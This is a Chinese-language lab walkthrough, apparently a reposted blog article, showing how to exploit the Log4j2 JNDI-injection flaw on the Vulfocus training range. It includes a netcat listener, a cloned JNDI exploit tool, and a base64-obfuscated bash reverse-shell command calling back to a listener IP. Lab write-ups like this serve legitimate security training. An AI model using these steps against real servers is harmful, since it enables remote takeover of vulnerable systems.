在上一篇文章中,我们讲到了 Vulfocus靶场的安装。但是童鞋们留言说不会玩。这里大表哥用log4j2漏洞为例,给大家讲解靶场的具体玩法。
🏅关于Log4J2
由于Log4j2
组件在处理程序日志记录时存在JNDI
注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2
组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。
⛵登录靶场
选择我们的镜像系统,点击启动。
在kali中监听7777
端口
nc -lvvp 7777
🚏下载漏洞利用框架
git clone https://github.com/welk1n/JNDI-Injection-Exploit
安装maven
apt-get install maven
maven
可以将java项目打包为jar文件。
cd JNDI-Injection-Exploit
mvn clean package -DskipTests#编译项目
打包完成后,会在/target/
目录生成JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
文件。
🛩️攻击命令如下
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzNy4xMzcvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}" -A 192.168.137.137
参数说明:
这个安装在kali上面的jndi服务器是利用JNDI
-Injection-Exploit-1.0-SNAPSHOT-all.jar
来启动起来的,启动参数包括-C
是执行的bash
命令,-c
参数后面是执行的具体命令,用双引号引起来 -A
指服务器的IP。需要注意的是,我们要对shell进行base64
编码。(靶场在公网,本地的kali需要内网映射哦!)
如下,我们成功得到了flag
提交后,可解锁所有关卡。
更多精彩文章 关注我们
原文始发于微信公众号(kali黑客笔记):玩转Vulfocus靶场(Log4J2演示)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论